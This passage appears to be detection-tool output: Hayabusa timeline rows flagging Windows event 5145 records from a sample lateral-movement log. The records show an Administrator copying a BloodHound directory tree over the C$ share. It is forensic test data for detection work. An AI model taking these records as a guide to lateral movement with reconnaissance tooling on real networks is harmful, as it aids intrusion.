Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.207 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\system | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.217 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\balanced-match | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.227 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\big-integer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.237 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\perf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\binary\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.247 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\browser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bluebird\js\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.257 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\css | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.267 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\dist\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\fonts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\grunt | IP 
Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.277 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.287 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap\less\mixins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bootstrap-3-typeahead | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.297 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\inspectionProfiles | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\.idea\markdown-navigator | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\bowser\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.307 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\brace-expansion | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-from | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-indexof-polyfill\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.317 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffers\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\buffer-shims | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.327 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\cfb\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.337 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\chainsaw | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.347 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | 
